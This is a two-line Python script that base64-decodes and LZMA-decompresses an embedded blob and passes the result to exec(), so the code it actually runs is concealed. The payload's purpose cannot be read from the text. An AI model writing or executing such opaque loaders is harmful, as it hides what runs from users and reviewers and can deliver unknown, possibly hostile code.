import lzma,base64
exec(lzma.decompress(base64.b64decode(b'/Td6WFoAAATm1rRGAgAhARYAAAB0L+Wj4AE8ALxdADIZSP9PCm8uEnWszOKJb7ahWBcNvHuyuXuUfe8kv+b3EqJwLyAnaVm3fBjrGdTg+JalHFCq5RhjBP3jPifgN+kG3S/uVQBr4gjdNlewNb4N2CiaSdjJclXPjkp2rYYo229mu1Z27aeyZ5U4tk4DJdWDtlIS/JBkFBKRSnTVyQuFXVS/sKeCamiM6DnF7te5f0WLnUl2rdDyHnYVVPqNMBBorBkGGrb70Y6JtJysoyv6lohaEaaHDw7AzKQAANRqTamyMQJAAAHYAb0CAAAGIcTsscRn+wIAAAAABFla')))